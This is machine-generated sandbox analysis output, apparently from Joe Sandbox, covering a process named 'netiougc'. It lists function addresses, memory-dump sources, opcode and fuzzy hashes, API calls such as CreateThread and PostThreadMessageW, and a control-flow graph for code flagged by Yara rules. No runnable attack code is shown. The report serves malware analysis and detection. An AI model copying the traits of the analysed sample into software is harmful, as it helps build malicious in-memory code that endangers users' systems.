                            Function 03A22AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000007.00000002.2906315071.00000000039B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 039B0000, based on PE: true
                            • Associated: 00000007.00000002.2906315071.0000000003AD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000007.00000002.2906315071.0000000003ADD000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000007.00000002.2906315071.0000000003B4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_39b0000_netiougc.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: cde02195ba2b9caa32ccbc50cfe9319275be2da996f36db022eff64c2d0dbe5f
                            • Instruction ID: 160b23867833ea9e9b2e9ae16dc475add611ac13b3cdecc0bd8e7719926032fb
                            • Opcode Fuzzy Hash: cde02195ba2b9caa32ccbc50cfe9319275be2da996f36db022eff64c2d0dbe5f
                            • Instruction Fuzzy Hash: F5900435711404030105F55C0704507005FC7D7351357C033F101D550CD735CD757131
                            Function 03A22FB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000007.00000002.2906315071.00000000039B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 039B0000, based on PE: true
                            • Associated: 00000007.00000002.2906315071.0000000003AD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000007.00000002.2906315071.0000000003ADD000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000007.00000002.2906315071.0000000003B4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_39b0000_netiougc.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: e7a6ca55d24d13ac8c2ea9d38a8510cb334aa5180638d1697469b847064a710a
                            • Instruction ID: 5cb53d7a635adf5297e32449c69f67bcf1934c6cd8a0222a88a499e86e8862f2
                            • Opcode Fuzzy Hash: e7a6ca55d24d13ac8c2ea9d38a8510cb334aa5180638d1697469b847064a710a
                            • Instruction Fuzzy Hash: B7900221A01404424140B16888449064019ABE2311756C122B099C550D865D89696675
                            Function 03A22FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000007.00000002.2906315071.00000000039B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 039B0000, based on PE: true
                            • Associated: 00000007.00000002.2906315071.0000000003AD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000007.00000002.2906315071.0000000003ADD000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000007.00000002.2906315071.0000000003B4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_39b0000_netiougc.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: 656d6e4b79feb72d88094e07fa6d1bb43e1ab87f429e4b8c62b084c96abbbf7f
                            • Instruction ID: dabff02c4a5b7c743aaa791b9724e0cc69becfe8d80e50b4a46a5121cdae732a
                            • Opcode Fuzzy Hash: 656d6e4b79feb72d88094e07fa6d1bb43e1ab87f429e4b8c62b084c96abbbf7f
                            • Instruction Fuzzy Hash: E3900221611C0442D200B5684C14B07001987D1303F56C116B0158554CCA1989656531
                            Function 03A22F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000007.00000002.2906315071.00000000039B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 039B0000, based on PE: true
                            • Associated: 00000007.00000002.2906315071.0000000003AD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000007.00000002.2906315071.0000000003ADD000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000007.00000002.2906315071.0000000003B4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_39b0000_netiougc.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: 70c2f5741dd8e597bebea6a55a39ebd2ad9a69662b69c49bf4ebe3dfbed0b892
                            • Instruction ID: f01cc42c3d3bf3d091d7b03e18c22b976e4862073b1111d282b2f8719dadb2a3
                            • Opcode Fuzzy Hash: 70c2f5741dd8e597bebea6a55a39ebd2ad9a69662b69c49bf4ebe3dfbed0b892
                            • Instruction Fuzzy Hash: 2E90026174140842D100B1584414B060019C7E2301F56C016F1068554D871DCD567136
                            Function 03A22E80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000007.00000002.2906315071.00000000039B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 039B0000, based on PE: true
                            • Associated: 00000007.00000002.2906315071.0000000003AD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000007.00000002.2906315071.0000000003ADD000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000007.00000002.2906315071.0000000003B4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_39b0000_netiougc.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: f6608f4fda7de311236960e6939e2def79b2bddfe2c64e76c433520b7a55c882
                            • Instruction ID: d26e106fcbad2356c31381a478330caaa3917a322029464899d4129c7f16448d
                            • Opcode Fuzzy Hash: f6608f4fda7de311236960e6939e2def79b2bddfe2c64e76c433520b7a55c882
                            • Instruction Fuzzy Hash: CC900221A0140902D101B1584404616001E87D1341F96C023B1028555ECB298A96B131
                            Function 03A22EE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000007.00000002.2906315071.00000000039B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 039B0000, based on PE: true
                            • Associated: 00000007.00000002.2906315071.0000000003AD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000007.00000002.2906315071.0000000003ADD000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000007.00000002.2906315071.0000000003B4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_39b0000_netiougc.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: 4e0571dbc8a8faa2958864561e8b9f7e4554c55889dca9e62bb35280ca4fdcf4
                            • Instruction ID: 55cc70177defbae5002091543cb57f95dd36bdab7d89d28b182f50552c5702a9
                            • Opcode Fuzzy Hash: 4e0571dbc8a8faa2958864561e8b9f7e4554c55889dca9e62bb35280ca4fdcf4
                            • Instruction Fuzzy Hash: 4B90026160180803D140B5584804607001987D1302F56C012B2068555E8B2D8D557135
                            Function 03A22DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000007.00000002.2906315071.00000000039B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 039B0000, based on PE: true
                            • Associated: 00000007.00000002.2906315071.0000000003AD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000007.00000002.2906315071.0000000003ADD000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000007.00000002.2906315071.0000000003B4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_39b0000_netiougc.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: 9367b3d3d4a598f4d14b85255975a4ffd7bc0d1abcce8d13b13356fdaea6df8e
                            • Instruction ID: b515fa97c37d72de4896e231ffd9489a0dcdbc2010d9ec4e78e93155ec949f1e
                            • Opcode Fuzzy Hash: 9367b3d3d4a598f4d14b85255975a4ffd7bc0d1abcce8d13b13356fdaea6df8e
                            • Instruction Fuzzy Hash: EF90023160140813D111B1584504707001D87D1341F96C413B0428558D975A8A56B131
                            Function 03A22DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000007.00000002.2906315071.00000000039B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 039B0000, based on PE: true
                            • Associated: 00000007.00000002.2906315071.0000000003AD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000007.00000002.2906315071.0000000003ADD000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000007.00000002.2906315071.0000000003B4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_39b0000_netiougc.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: a431b2e0f67ceff4be5aefb423c6c83b51ae5ab10d5c43775a1536bd8ef86b4c
                            • Instruction ID: 8a10398ac9ca821f945252797e3f30fd044cc9f90e93992ba603ef6a40c34c73
                            • Opcode Fuzzy Hash: a431b2e0f67ceff4be5aefb423c6c83b51ae5ab10d5c43775a1536bd8ef86b4c
                            • Instruction Fuzzy Hash: AB900221642445525545F1584404507401A97E1341796C013B1418950C862A995AE631
                            Function 03A22D30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000007.00000002.2906315071.00000000039B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 039B0000, based on PE: true
                            • Associated: 00000007.00000002.2906315071.0000000003AD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000007.00000002.2906315071.0000000003ADD000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000007.00000002.2906315071.0000000003B4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_39b0000_netiougc.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: e00ff7a8aeaec0958ce9bd2397135aeeffe18228addee51582320120782dc5f6
                            • Instruction ID: ae99986848abeda56b08a626d5b1f512bb3b1f8113b2611f7874c5b55edda665
                            • Opcode Fuzzy Hash: e00ff7a8aeaec0958ce9bd2397135aeeffe18228addee51582320120782dc5f6
                            • Instruction Fuzzy Hash: 7590022170140403D140B15854186064019D7E2301F56D012F0418554CDA19895A6232
                            Function 03A22D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000007.00000002.2906315071.00000000039B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 039B0000, based on PE: true
                            • Associated: 00000007.00000002.2906315071.0000000003AD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000007.00000002.2906315071.0000000003ADD000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000007.00000002.2906315071.0000000003B4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_39b0000_netiougc.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: 5f405398f90fec768416acd4e7f7fc7f4c9911051805be5216f0e0335cd84d39
                            • Instruction ID: 59f2459af9d0ce7941dc0a847c84029aa8cb8278c9e47df1c05ac029664a8e84
                            • Opcode Fuzzy Hash: 5f405398f90fec768416acd4e7f7fc7f4c9911051805be5216f0e0335cd84d39
                            • Instruction Fuzzy Hash: 7390022961340402D180B158540860A001987D2302F96D416B0019558CCA19896D6331
                            Function 03A22CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000007.00000002.2906315071.00000000039B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 039B0000, based on PE: true
                            • Associated: 00000007.00000002.2906315071.0000000003AD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000007.00000002.2906315071.0000000003ADD000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000007.00000002.2906315071.0000000003B4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_39b0000_netiougc.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: 317372b83986aab63e65508402916ef39d32d8a809a50d776e8b13e53e4958b9
                            • Instruction ID: 3afda048a7ae5aaa6962d36ab954ec20e096ef8d8befaf2d0e1987df40ef8cb1
                            • Opcode Fuzzy Hash: 317372b83986aab63e65508402916ef39d32d8a809a50d776e8b13e53e4958b9
                            • Instruction Fuzzy Hash: 8790023160140802D100B5985408646001987E1301F56D012B5028555EC76989957131
                            Function 03A22C60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000007.00000002.2906315071.00000000039B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 039B0000, based on PE: true
                            • Associated: 00000007.00000002.2906315071.0000000003AD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000007.00000002.2906315071.0000000003ADD000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000007.00000002.2906315071.0000000003B4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_39b0000_netiougc.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: b049b6c20d6f09c134c97145dc6449d76b12e6dcc6cdf70873d5d5136a6579b5
                            • Instruction ID: f53f36c65b30445c8f2d8ca326fbf93a6616a82bbe0b5bb3af65a7101c9d6676
                            • Opcode Fuzzy Hash: b049b6c20d6f09c134c97145dc6449d76b12e6dcc6cdf70873d5d5136a6579b5
                            • Instruction Fuzzy Hash: 0C90023160140C42D100B1584404B46001987E1301F56C017B0128654D8719C9557531
                            Function 03A22C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000007.00000002.2906315071.00000000039B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 039B0000, based on PE: true
                            • Associated: 00000007.00000002.2906315071.0000000003AD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000007.00000002.2906315071.0000000003ADD000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000007.00000002.2906315071.0000000003B4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_39b0000_netiougc.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: 8fcbf58f6c4f89fc1980278b380e3cf74bb17f7b11abd897256737f072135cc0
                            • Instruction ID: 28144438e214a90f86187628eb02b6f9f76018e8364e88c36b927e5abbcbe3e4
                            • Opcode Fuzzy Hash: 8fcbf58f6c4f89fc1980278b380e3cf74bb17f7b11abd897256737f072135cc0
                            • Instruction Fuzzy Hash: F490023160148C02D110B158840474A001987D1301F5AC412B4428658D879989957131
                            Function 03A235C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000007.00000002.2906315071.00000000039B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 039B0000, based on PE: true
                            • Associated: 00000007.00000002.2906315071.0000000003AD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000007.00000002.2906315071.0000000003ADD000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000007.00000002.2906315071.0000000003B4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_39b0000_netiougc.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: 74c5c68cbbdfaeb670d81c8020d0f408c0f06879a1c712c736e84e21dd21bdd8
                            • Instruction ID: ea9b0324d9a223d101b08c30c15ec3847895437c2f2f9a1456dc1fab79729e47
                            • Opcode Fuzzy Hash: 74c5c68cbbdfaeb670d81c8020d0f408c0f06879a1c712c736e84e21dd21bdd8
                            • Instruction Fuzzy Hash: 50900231A0550802D100B1584514706101987D1301F66C412B0428568D87998A5575B2
                            Function 03A239B0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000007.00000002.2906315071.00000000039B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 039B0000, based on PE: true
                            • Associated: 00000007.00000002.2906315071.0000000003AD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000007.00000002.2906315071.0000000003ADD000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000007.00000002.2906315071.0000000003B4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_39b0000_netiougc.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: 8408f822923f68e9683172d270777b0657abba9591bbbb9a1bf2560f77058b8c
                            • Instruction ID: bcc530e778164428f9d29272d61015dbea0aaca2ab7e2048d861ef254d19eebc
                            • Opcode Fuzzy Hash: 8408f822923f68e9683172d270777b0657abba9591bbbb9a1bf2560f77058b8c
                            • Instruction Fuzzy Hash: E490022164545502D150B15C44046164019A7E1301F56C022B0818594D865989597231
                            Function 03219736 Relevance: 59.7, APIs: 1, Strings: 33, Instructions: 185threadCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 0 3219736-3219737 1 32196f0 0->1 2 3219739-3219c0b 0->2 4 32196f2-32196f9 1->4 5 32196fa-3219711 call 3231380 1->5 9 3219c15-3219c1c 2->9 4->5 10 3219730-3219735 5->10 11 3219713-321972f call 323b5c7 CreateThread 5->11 12 3219c43-3219c54 9->12 13 3219c1e-3219c41 9->13 15 3219c65-3219c71 12->15 13->9 17 3219c73-3219c86 15->17 18 3219c88-3219c8c 15->18 17->15 19 3219cad-3219cb9 18->19 20 3219c8e-3219cab 18->20 22 3219cbb-3219cdc 19->22 23 3219cde-3219cef 19->23 20->18 22->19 24 3219d00-3219d07 23->24 25 3219d09-3219d1a 24->25 26 3219d1c 24->26 25->24 28 3219d23-3219d2f 26->28 29 3219d31-3219d52 28->29 30 3219d54-3219d5d 28->30 29->28 31 3219fa0-3219faa 30->31 32 3219d63-3219d6d 30->32 33 3219fbb-3219fc7 31->33 34 3219d7e-3219d8a 32->34 35 3219fd7-3219fe1 33->35 36 3219fc9-3219fd5 33->36 37 3219da0-3219daa 34->37 38 3219d8c-3219d9e 34->38 41 3219fe3-321a002 35->41 42 321a015-321a01c 35->42 36->33 39 3219dbb-3219dc7 37->39 38->34 44 3219dc9-3219dd2 39->44 45 3219ddf-3219def 39->45 46 321a013 41->46 47 321a004-321a00d 41->47 48 321a022-321a02c 42->48 49 321a229-321a230 42->49 52 3219dd4-3219dd7 44->52 53 3219ddd 44->53 54 3219dfa-3219e01 45->54 46->35 47->46 55 321a03d-321a049 48->55 50 321a262-321a26b 49->50 51 321a232-321a260 49->51 51->49 52->53 53->39 59 3219e03-3219e2a 54->59 60 3219e2c-3219e33 54->60 56 321a059-321a070 55->56 57 321a04b-321a057 55->57 62 321a081-321a08d 56->62 57->55 59->54 64 3219e35-3219e58 60->64 65 3219e5a-3219e69 60->65 66 321a0a4 call 3239c70 62->66 67 321a08f-321a0a2 62->67 64->60 68 3219e6b-3219e75 65->68 69 3219eaf-3219eb9 65->69 76 321a0a9-321a0b0 66->76 71 321a072-321a07b 67->71 73 3219e86-3219e92 68->73 70 3219eca-3219ed6 69->70 74 3219ed8-3219eea 70->74 75 3219eec-3219ef6 70->75 71->62 77 3219e94-3219e9d 73->77 78 3219eaa 73->78 74->70 82 3219f07-3219f13 75->82 83 321a0b2-321a0d5 76->83 84 321a0d7-321a0e1 76->84 79 3219ea8 77->79 80 3219e9f-3219ea2 77->80 78->31 79->73 80->79 86 3219f15-3219f28 82->86 87 3219f2a-3219f30 82->87 83->76 88 321a0f2-321a0fe 84->88 86->82 90 3219f34-3219f3b 87->90 91 321a100-321a112 88->91 92 321a114-321a11e 88->92 93 3219f62-3219f6c 90->93 94 3219f3d-3219f60 90->94 91->88 96 321a12f-321a13b 92->96 99 3219f7d-3219f89 93->99 94->90 97 321a151-321a155 96->97 98 321a13d-321a14f 96->98 103 321a157-321a17c 97->103 104 321a17e-321a188 97->104 98->96 100 3219f9b 99->100 101 3219f8b-3219f91 99->101 100->30 105 3219f93-3219f96 101->105 106 3219f99 101->106 103->97 107 321a199-321a1a0 104->107 105->106 106->99 109 321a1a2-321a1c7 107->109 110 321a1c9-321a1e2 107->110 109->107 110->110 112 321a1e4-321a1ee 110->112 113 321a1ff-321a20b 112->113 113->49 114 321a20d-321a219 113->114 115 321a227 114->115 116 321a21b-321a221 114->116 115->113 116->115
                            APIs
                            • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 03219725
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2904124594.0000000003210000.00000040.80000000.00040000.00000000.sdmp, Offset: 03210000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_3210000_netiougc.jbxd
                            Yara matches
                            Similarity
                            • API ID: CreateThread
                            • String ID: "*$#$$$*O$3E$4$5$6$8$C$I$KF$Kv$L$LL$R*$RC$T$Y$a$c$c%$d$hd$l$m$y(${$|$)$D$Y$b
                            • API String ID: 2422867632-1487839028
                            • Opcode ID: ba8a4dbb8a442425e938609ba433a12e6699c93372ad438634db41c428d99022
                            • Instruction ID: 751625b3c3b82245040658ea68b6354c9bebe0596308880f9a7c4028529bf21b
                            • Opcode Fuzzy Hash: ba8a4dbb8a442425e938609ba433a12e6699c93372ad438634db41c428d99022
                            • Instruction Fuzzy Hash: 7DC139B0905769CBFB60CF41C9997DEBAB0BB45308F5081D9D1582B281CBFA1AC9CF95
                            Function 03220B00 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60threadwindowCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                            • PostThreadMessageW.USER32(3e3-f82u,00000111,00000000,00000000), ref: 03220B77
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2904124594.0000000003210000.00000040.80000000.00040000.00000000.sdmp, Offset: 03210000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_3210000_netiougc.jbxd
                            Yara matches
                            Similarity
                            • API ID: MessagePostThread
                            • String ID: 3e3-f82u$3e3-f82u
                            • API String ID: 1836367815-3570064524
                            • Opcode ID: c0c6280c28913a88c558e5d1049345c9087b2b28b57d7dc2852f384087dfd47d
                            • Instruction ID: 1a1c44642d2f187102d39aee8a0273532712f6af6955b7792deb48dcbcd51a1f
                            • Opcode Fuzzy Hash: c0c6280c28913a88c558e5d1049345c9087b2b28b57d7dc2852f384087dfd47d
                            • Instruction Fuzzy Hash: 6901C4B6D0025C7AEB10EBA18C81EEF7B7CDF41698F048064FA04BB100D6755E468BE1
                            Function 03220AF9 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60threadwindowCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 643 3220af9-3220b12 644 3220b1a-3220b6a call 323aa80 call 32244e0 call 3211410 call 3231380 643->644 645 3220b15 call 323a070 643->645 654 3220b8a-3220b90 644->654 655 3220b6c-3220b7b PostThreadMessageW 644->655 645->644 655->654 656 3220b7d-3220b87 655->656 656->654
                            APIs
                            • PostThreadMessageW.USER32(3e3-f82u,00000111,00000000,00000000), ref: 03220B77
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2904124594.0000000003210000.00000040.80000000.00040000.00000000.sdmp, Offset: 03210000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_3210000_netiougc.jbxd
                            Yara matches
                            Similarity
                            • API ID: MessagePostThread
                            • String ID: 3e3-f82u$3e3-f82u
                            • API String ID: 1836367815-3570064524
                            • Opcode ID: 97bed52d89612a046c3a76c337089d362d5a8a305542d7027ea3ca2165dd0553
                            • Instruction ID: 5396962406caefae2e54920fa20737a8222aa00425617d3d0669748d25f28673
                            • Opcode Fuzzy Hash: 97bed52d89612a046c3a76c337089d362d5a8a305542d7027ea3ca2165dd0553
                            • Instruction Fuzzy Hash: 4501E5B6D0025C7AEB11EBA48C81EEF7B3CDF41698F048064FA04BB100D1745E068BE1
                            Function 03232C60 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 104sleepCOMMON
                            Download Yara Rule
                            APIs
                            • Sleep.KERNELBASE(000007D0), ref: 03232D2B
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2904124594.0000000003210000.00000040.80000000.00040000.00000000.sdmp, Offset: 03210000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_3210000_netiougc.jbxd
                            Yara matches
                            Similarity
                            • API ID: Sleep
                            • String ID: net.dll$wininet.dll
                            • API String ID: 3472027048-1269752229
                            • Opcode ID: cce403f1ef7ecd4909ac2166125a3abd383449046d663b78a512fce05cbc157f
                            • Instruction ID: 7d44eb42d772506de271eb9b2657f7587eb9e7ecee81521355fc60b1a56fd6cd
                            • Opcode Fuzzy Hash: cce403f1ef7ecd4909ac2166125a3abd383449046d663b78a512fce05cbc157f
                            • Instruction Fuzzy Hash: 31318BB5600705BBD714DF64C881FE7FBBCAB89704F048529EA59AB244D7B0B684CBA1
                            Function 03224560 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 102COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2904124594.0000000003210000.00000040.80000000.00040000.00000000.sdmp, Offset: 03210000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_3210000_netiougc.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: %
                            • API String ID: 0-2567322570
                            • Opcode ID: 31435a2de6e9dcd5047e3490d85f2cb0b886ad7c4131b10d5f15071b1693a14e
                            • Instruction ID: 6a155023c6d9480beb744c2260b23adc1e56c1c4d7ccc7cb6c70c1457e00c75d
                            • Opcode Fuzzy Hash: 31435a2de6e9dcd5047e3490d85f2cb0b886ad7c4131b10d5f15071b1693a14e
                            • Instruction Fuzzy Hash: B421BEB1A24352FFCB11EF69DCCB6E5FFA8FB05311B5401A9E4408B406D77155A1CBA4
                            Function 0322ECC5 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 114COMMON
                            Download Yara Rule
                            APIs
                            • CoInitialize.OLE32(00000000), ref: 0322ECE7
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2904124594.0000000003210000.00000040.80000000.00040000.00000000.sdmp, Offset: 03210000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_3210000_netiougc.jbxd
                            Yara matches
                            Similarity
                            • API ID: Initialize
                            • String ID: @J7<
                            • API String ID: 2538663250-2016760708
                            • Opcode ID: d0032d7c985f010d29c3d10ffc862fae05c393eee5d5759b712857dfc701e6d8
                            • Instruction ID: e2561c0a5531e5cc0c1fc7c8935be35fed767a4488a927d96609e709c0f1f631
                            • Opcode Fuzzy Hash: d0032d7c985f010d29c3d10ffc862fae05c393eee5d5759b712857dfc701e6d8
                            • Instruction Fuzzy Hash: CB4172B6A1060AAFCB10DFD8DC809EEB7B9FF88304B148559E505EB204D771EE45CBA0
                            Function 0322ECD0 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 101COMMON
                            Download Yara Rule
                            APIs
                            • CoInitialize.OLE32(00000000), ref: 0322ECE7
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2904124594.0000000003210000.00000040.80000000.00040000.00000000.sdmp, Offset: 03210000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_3210000_netiougc.jbxd
                            Yara matches
                            Similarity
                            • API ID: Initialize
                            • String ID: @J7<
                            • API String ID: 2538663250-2016760708
                            • Opcode ID: 107479310989bd27814fd21d64a1c36b92a04000098039477319e4c58e909f32
                            • Instruction ID: e838e6cecc39d5ebb1729acda0944213edef741bff532c64e19f0bc2c1bb9638
